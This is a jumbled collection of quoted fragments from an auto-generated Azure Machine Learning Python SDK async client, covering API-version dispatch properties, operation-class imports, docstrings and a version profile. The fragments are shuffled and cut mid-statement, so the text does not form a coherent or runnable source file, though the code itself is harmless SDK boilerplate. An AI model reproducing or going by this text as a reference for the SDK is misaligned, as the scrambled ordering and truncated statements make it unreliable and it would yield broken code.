:class:`DatasetV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetV2Operations>` \"\"\" api_version =", "{} does not have operation group 'run'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", 
"raise ValueError(\"API version {} does not have operation group 'jobs'\".format(api_version)) return OperationClass(self._client, self._config,", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'run_artifacts'\".format(api_version)) return", "version: * 1.5.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DeleteOperations>` * v1.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.DeleteOperations>` \"\"\" api_version = self._get_api_version('delete') if api_version", "== '2021-10-01': from ..v2021_10_01.aio.operations import BatchDeploymentsOperations as OperationClass elif api_version == '2022-02-01-preview': from", "DatastoresOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DatastoresOperations as OperationClass", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def experiments(self): \"\"\"Instance depends on the API version: * v1.0:", "group 'run_artifacts'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def runs(self): \"\"\"Instance depends on", "_PROFILE_TAG: { None: DEFAULT_API_VERSION, 'assets': '1.0.0', 'async_operations': 'v1.0', 'batch_job_deployment': '2020-09-01-dataplanepreview', 'batch_job_endpoint': '2020-09-01-dataplanepreview', 'data_call':", "== 'v1.0': from ..runhistory.aio.operations import SpansOperations as OperationClass else: raise ValueError(\"API version {}", "= self._get_api_version('batch_deployments') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import BatchDeploymentsOperations as OperationClass elif", "dict. 
:type profile: azure.profiles.KnownProfiles :keyword int polling_interval: Default waiting time between two polls", "from ..v2021_10_01.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import", "'1.0.0', 'registry_management_non_workspace': 'v1.0', 'run': 'v1.0', 'run_artifacts': 'v1.0', 'runs': 'v1.0', 'spans': 'v1.0', 'temporary_data_references': '2021-10-01-dataplanepreview',", "KnownProfiles.default, **kwargs # type: Any ) -> None: self._config = AzureMachineLearningWorkspacesConfiguration(credential, subscription_id, **kwargs)", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'workspace_features'\".format(api_version))", "from azure.profiles.multiapiclient import MultiApiClientMixin from msrest import Deserializer, Serializer from ._configuration import AzureMachineLearningWorkspacesConfiguration", "from ..v2021_10_01_dataplanepreview.aio.operations import CodeVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", "..runhistory.aio.operations import RunsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "def data_versions(self): \"\"\"Instance depends on the API version: * 2022-02-01-preview: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataVersionsOperations>` * 2022-05-01:", "the API version: * v1.0: :class:`MetricOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.MetricOperations>` \"\"\" api_version = self._get_api_version('metric') if api_version ==", "to use if no profile is provided, or if missing in profile. 
:type", "Deserializer(self._models_dict(api_version))) @property def code_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeContainersOperations>`", "import ComponentVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "@property def component_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentVersionsOperations>` *", "DatastoresOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "* 2022-01-01-preview: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.VirtualMachineSizesOperations>` * 2022-05-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.VirtualMachineSizesOperations>` \"\"\" api_version = self._get_api_version('virtual_machine_sizes') if api_version ==", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_controller_v2(self): \"\"\"Instance depends on the API version: * 1.5.0:", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_version(self): \"\"\"Instance depends on the API", "profile. 
:type api_version: str :param base_url: Service URL :type base_url: str :param profile:", "== '2022-02-01-preview': from ..v2022_02_01_preview import models return models elif api_version == '2022-05-01': from", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchEndpointsOperations as OperationClass elif api_version == '2022-05-01': from", "component_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentContainersOperations>`", "if api_version == '1.0.0': from ..model_dataplane.aio.operations import MigrationOperations as OperationClass else: raise ValueError(\"API", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'datastores'\".format(api_version)) return", ":class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentContainersOperations>` * 2022-02-01-preview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentContainersOperations>` * 2022-05-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentContainersOperations>` \"\"\" api_version =", "2021-10-01-dataplanepreview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentContainersOperations>` * 2022-02-01-preview: 
:class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentContainersOperations>` * 2022-05-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentContainersOperations>` \"\"\" api_version = self._get_api_version('environment_containers') if", "import EventsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "api_version = self._get_api_version('async_operations') if api_version == 'v1.0': from ..registry_discovery.aio.operations import AsyncOperationsOperations as OperationClass", "on the API version: * 2021-10-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineDeploymentsOperations>` * 2022-02-01-preview: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineDeploymentsOperations>` * 2022-05-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineDeploymentsOperations>`", "import EnvironmentContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentContainersOperations as", "not have operation group 'batch_job_endpoint'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_containers(self):", "the API version: * 2021-10-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.VirtualMachineSizesOperations>` * 2022-01-01-preview: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.VirtualMachineSizesOperations>` * 2022-05-01: 
:class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.VirtualMachineSizesOperations>` \"\"\"", "of MultiApiClientMixin.\" Will be removed in final version of multiapi azure-core based client", "'2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceConnectionsOperations as OperationClass else: raise ValueError(\"API version {} does", "azure.profiles.multiapiclient import MultiApiClientMixin from msrest import Deserializer, Serializer from ._configuration import AzureMachineLearningWorkspacesConfiguration if", "# Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT", "2022-02-01-preview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentContainersOperations>` * 2022-05-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentContainersOperations>` \"\"\" api_version = self._get_api_version('component_containers') if api_version == '2021-10-01':", "as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentContainersOperations as OperationClass elif", "2022-05-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceConnectionsOperations>` \"\"\" api_version = self._get_api_version('workspace_connections') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentVersionsOperations as OperationClass elif", "* 2022-02-01-preview: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataVersionsOperations>` * 2022-05-01: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataVersionsOperations>` \"\"\" api_version = 
self._get_api_version('data_versions') if api_version ==", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import PrivateLinkResourcesOperations as OperationClass else: raise ValueError(\"API", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def events(self): \"\"\"Instance depends on the API", "2022-02-01-preview: :mod:`v2022_02_01_preview.models<azure.mgmt.machinelearningservices.v2022_02_01_preview.models>` * 2022-05-01: :mod:`v2022_05_01.models<azure.mgmt.machinelearningservices.v2022_05_01.models>` \"\"\" if api_version == '1.5.0': from ..dataset_dataplane import", "have operation group 'batch_job_endpoint'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_containers(self): \"\"\"Instance", "..v2022_02_01_preview.aio.operations import DatastoresOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DatastoresOperations", "API version: * v1.0: :class:`RunsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunsOperations>` \"\"\" api_version = self._get_api_version('runs') if api_version == 'v1.0':", "@property def compute(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComputeOperations>` *", "version {} does not have operation group 'delete'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "{} does not have operation group 'online_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", 
"..v2021_10_01.aio.operations import ModelContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelContainersOperations", "profile=profile ) @classmethod def _models_dict(cls, api_version): return {k: v for k, v in", "2022-01-01-preview: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.VirtualMachineSizesOperations>` * 2022-05-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.VirtualMachineSizesOperations>` \"\"\" api_version = self._get_api_version('virtual_machine_sizes') if api_version == '2021-10-01':", "..v2022_01_01_preview.aio.operations import VirtualMachineSizesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import VirtualMachineSizesOperations", "self._get_api_version('experiments') if api_version == 'v1.0': from ..runhistory.aio.operations import ExperimentsOperations as OperationClass else: raise", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "..v2022_02_01_preview.aio.operations import ModelVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ModelVersionsOperations", "'2020-09-01-dataplanepreview', 'batch_job_endpoint': '2020-09-01-dataplanepreview', 'data_call': '1.5.0', 'data_container': '1.5.0', 'data_version': '1.5.0', 'dataset_containers': '2021-10-01', 'dataset_controller_v2': '1.5.0',", "{} does not have operation group 'migration'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations 
import Operations as OperationClass elif api_version ==", "\"\"\"Instance depends on the API version: * 2022-02-01-preview: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataVersionsOperations>` * 2022-05-01: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataVersionsOperations>` \"\"\"", "import QuotasOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import QuotasOperations as", "or if missing in profile. :type api_version: str :param base_url: Service URL :type", "'run_artifacts'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def runs(self): \"\"\"Instance depends on the", "API version if the operation group is not described in the profile. :param", "return models elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview import models return models elif", "depends on the API version: * 1.0.0: :class:`ExtensiveModelOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ExtensiveModelOperations>` \"\"\" api_version = self._get_api_version('extensive_model') if", "raise ValueError(\"API version {} does not have operation group 'batch_job_deployment'\".format(api_version)) return OperationClass(self._client, self._config,", "from ..runhistory.aio.operations import RunsOperations as OperationClass else: raise ValueError(\"API version {} does not", "\"\"\"Instance depends on the API version: * 1.5.0: :class:`DataVersionOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataVersionOperations>` \"\"\" api_version = self._get_api_version('data_version')", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run(self): \"\"\"Instance depends on the 
API version:", "group 'workspaces'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) async def close(self): await self._client.close() async", "== '2021-10-01': from ..v2021_10_01.aio.operations import PrivateLinkResourcesOperations as OperationClass elif api_version == '2022-01-01-preview': from", "\"\"\"Module depends on the API version: * 1.5.0: :mod:`dataset_dataplane.models<azure.mgmt.machinelearningservices.dataset_dataplane.models>` * 1.0.0: :mod:`model_dataplane.models<azure.mgmt.machinelearningservices.model_dataplane.models>` *", "..v2022_02_01_preview.aio.operations import DataContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DataContainersOperations", "..v2022_05_01.aio.operations import WorkspacesOperations as OperationClass else: raise ValueError(\"API version {} does not have", "..v2021_10_01_dataplanepreview.aio.operations import TemporaryDataReferencesOperations as OperationClass else: raise ValueError(\"API version {} does not have", "API version: * 1.5.0: :class:`DatasetControllerV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetControllerV2Operations>` \"\"\" api_version = self._get_api_version('dataset_controller_v2') if api_version == '1.5.0':", "import ModelVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelVersionsOperations as", "API version: * 2021-10-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-01-01-preview: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-05-01: 
:class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateEndpointConnectionsOperations>` \"\"\" api_version", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import CodeVersionsOperations as OperationClass else:", "operation group 'operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_endpoint_connections(self): \"\"\"Instance depends", "on the API version: * v1.0: :class:`RunsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunsOperations>` \"\"\" api_version = self._get_api_version('runs') if api_version", "does not have operation group 'compute'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_containers(self): \"\"\"Instance depends on the API version:", "ValueError(\"API version {} does not have operation group 'runs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "the API version: * 2021-10-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineEndpointsOperations>` * 2022-02-01-preview: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineEndpointsOperations>` * 2022-05-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineEndpointsOperations>` \"\"\"", "not have operation group 'spans'\".format(api_version)) return OperationClass(self._client, self._config, 
Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def temporary_data_references(self):", "import CodeContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeContainersOperations as", "should stick to a particular api-version and/or profile. The profile sets a mapping", "from ..v2021_10_01_dataplanepreview.aio.operations import CodeContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", "from ..v2021_10_01.aio.operations import Operations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import", "version {} does not have operation group 'runs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "depends on the API version: * v1.0: :class:`EventsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.EventsOperations>` \"\"\" api_version = self._get_api_version('events') if", "EnvironmentVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentVersionsOperations as OperationClass", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ModelVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview':", "version: * 2021-10-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeContainersOperations>` * 2021-10-01-dataplanepreview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeContainersOperations>` * 2022-02-01-preview: 
:class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeContainersOperations>` * 2022-05-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeContainersOperations>`", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datastores(self): \"\"\"Instance depends on the API version:", "version {} does not have operation group 'workspace_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "temporary_data_references(self): \"\"\"Instance depends on the API version: * 2021-10-01-dataplanepreview: :class:`TemporaryDataReferencesOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.TemporaryDataReferencesOperations>` \"\"\" api_version =", "ValueError(\"API version {} does not have operation group 'usages'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "to dict. :type profile: azure.profiles.KnownProfiles :keyword int polling_interval: Default waiting time between two", "'1.0.0': from ..model_dataplane.aio.operations import ModelsOperations as OperationClass else: raise ValueError(\"API version {} does", "# -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. 
# Licensed under", "from ..v2022_05_01.aio.operations import EnvironmentVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not", "version: * v1.0: :class:`RegistryManagementNonWorkspaceOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.RegistryManagementNonWorkspaceOperations>` \"\"\" api_version = self._get_api_version('registry_management_non_workspace') if api_version == 'v1.0': from", "Deserializer(self._models_dict(api_version))) @property def run_artifacts(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RunArtifactsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunArtifactsOperations>`", "allow end users to operate on Azure Machine Learning Workspace resources. This ready", "'code_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_versions(self): \"\"\"Instance depends on the", "have operation group 'component_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def compute(self): \"\"\"Instance", ":class:`ExperimentsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.ExperimentsOperations>` \"\"\" api_version = self._get_api_version('experiments') if api_version == 'v1.0': from ..runhistory.aio.operations import ExperimentsOperations", "elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelContainersOperations as OperationClass elif api_version ==", "..v2022_05_01.aio.operations import Operations as OperationClass else: raise ValueError(\"API version {} does not have", "= self._get_api_version('dataset_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import 
DatasetContainersOperations as OperationClass else:", "Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect", "import ComputeOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "..runhistory.aio.operations import EventsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "QuotasOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import QuotasOperations as OperationClass", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run(self): \"\"\"Instance depends on the API version: * v1.0:", "API version: * 1.5.0: :class:`DataCallOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataCallOperations>` \"\"\" api_version = self._get_api_version('data_call') if api_version == '1.5.0':", "api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeVersionsOperations as OperationClass elif api_version == '2022-02-01-preview':", "environment_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentVersionsOperations>`", "= self._get_api_version('temporary_data_references') if api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import TemporaryDataReferencesOperations as OperationClass else:", "..v2022_02_01_preview.aio.operations import ModelContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ModelContainersOperations", "\"\"\"Instance depends on the API version: * 1.0.0: 
:class:`MigrationOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.MigrationOperations>` \"\"\" api_version = self._get_api_version('migration')", "== '2022-05-01': from ..v2022_05_01.aio.operations import CodeVersionsOperations as OperationClass else: raise ValueError(\"API version {}", "the API version: * 2021-10-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceConnectionsOperations>` * 2022-01-01-preview: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceConnectionsOperations>` * 2022-05-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceConnectionsOperations>` \"\"\"", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif api_version == '2022-01-01-preview':", "def async_operations(self): \"\"\"Instance depends on the API version: * v1.0: :class:`AsyncOperationsOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.AsyncOperationsOperations>` \"\"\" api_version", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def extensive_model(self): \"\"\"Instance depends on the API", "self._get_api_version('temporary_data_references') if api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import TemporaryDataReferencesOperations as OperationClass else: raise", "not have operation group 'usages'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def virtual_machine_sizes(self):", "version {} does not have operation group 'online_deployments'\".format(api_version)) return 
OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DataVersionsOperations as OperationClass else:", "group 'assets'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def async_operations(self): \"\"\"Instance depends on", "API version: * v1.0: :class:`SpansOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.SpansOperations>` \"\"\" api_version = self._get_api_version('spans') if api_version == 'v1.0':", "ModelVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelVersionsOperations as OperationClass", "{} does not have operation group 'component_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datastores(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "..v2022_01_01_preview.aio.operations import WorkspaceConnectionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceConnectionsOperations", "group 'migration'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_containers(self): \"\"\"Instance depends on", "client \"\"\" pass class AzureMachineLearningWorkspaces(MultiApiClientMixin, _SDKClient): \"\"\"These APIs allow end users to operate", "operation group 'private_endpoint_connections'\".format(api_version)) 
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_link_resources(self): \"\"\"Instance depends", "= self._get_api_version('online_endpoints') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import OnlineEndpointsOperations as OperationClass elif", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import Operations as OperationClass else: raise ValueError(\"API", "== '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from", "import BatchEndpointsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "else: raise ValueError(\"API version {} does not have operation group 'batch_job_deployment'\".format(api_version)) return OperationClass(self._client,", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def extensive_model(self): \"\"\"Instance depends on the API version: * 1.0.0:", "client to connect to Azure. 
:type credential: ~azure.core.credentials_async.AsyncTokenCredential :param subscription_id: The ID of", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_versions(self): \"\"\"Instance depends on the API version:", "self._get_api_version('data_containers') if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataContainersOperations as OperationClass elif api_version", "the API version: * 2021-10-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentContainersOperations>` * 2022-02-01-preview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentContainersOperations>` *", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineEndpointsOperations>` * 2022-02-01-preview: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineEndpointsOperations>` *", "does not have operation group 'spans'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "\"azure.mgmt.machinelearningservices.AzureMachineLearningWorkspaces\" LATEST_PROFILE = ProfileDefinition({ _PROFILE_TAG: { None: DEFAULT_API_VERSION, 'assets': '1.0.0', 'async_operations': 'v1.0', 'batch_job_deployment':", "else: raise ValueError(\"API version {} does not have operation group 'datastores'\".format(api_version)) return OperationClass(self._client,", "def metric(self): \"\"\"Instance 
